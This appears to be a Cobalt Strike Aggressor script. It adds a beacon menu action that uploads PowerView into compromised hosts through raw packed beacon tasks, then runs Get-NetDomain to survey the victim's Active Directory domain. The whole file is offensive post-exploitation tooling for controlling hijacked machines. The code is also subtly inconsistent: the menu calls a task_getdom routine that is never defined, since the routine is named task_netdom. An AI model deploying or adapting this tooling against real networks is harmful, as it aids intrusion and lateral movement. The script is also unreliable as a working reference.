on heartbeat_30s {
	local('@beacons $beacon $bid %data @new @all');

	# grab all beacon ids AND build a map between ids and data
	@beacons = beacons();
	foreach $beacon (@beacons) {
	$bid = $beacon['id'];
	%data[$bid] = $beacon;
	push(@all, $bid);
	}
}


popup beacon_top {
  item "Get-NetDomain" {
      local('$bid');
      foreach $bid ($1) {
         task_getdom($bid);
      }
   }
}

sub task_powershell_import {
    # task ID ($1) with powershell command + args ($2)
    local('$id $len');

    $id = $1;
    $data = $2;
    $len = strlen($data);

    # task beacon to import the PowerShell script
    call_async("beacon.task", $id, pack("IIZ $+ $len", 0x25, $len, $data), lhost());
    call_async("beacon.log_write", $id, "[*] Tasked beacon to import PowerShell\n");
}

# task our beacon to execute a given powershell command
sub task_powershell {

    $id = $1;
    $len  = strlen($2);

    call_async("beacon.task", $id, pack("IIZ $+ $len", 0x24, $len, $2), lhost());
    call_async("beacon.log_write", $id, "[*] Tasked beacon to run: $2 $+ \n");
}

sub task_netdom {
    $beacon_id = $1;
    $script_source = script_resource("powerview.ps1");

    # get all of our data that we're going to upload
    $handle = openf($script_source);
    $data = readb($handle, -1);
    closef($handle);

    # task the beacon to import the powershell data
    task_powershell_import($beacon_id, $data);

    # actually task the beacon
    task_powershell($beacon_id, "Get-NetDomain");
}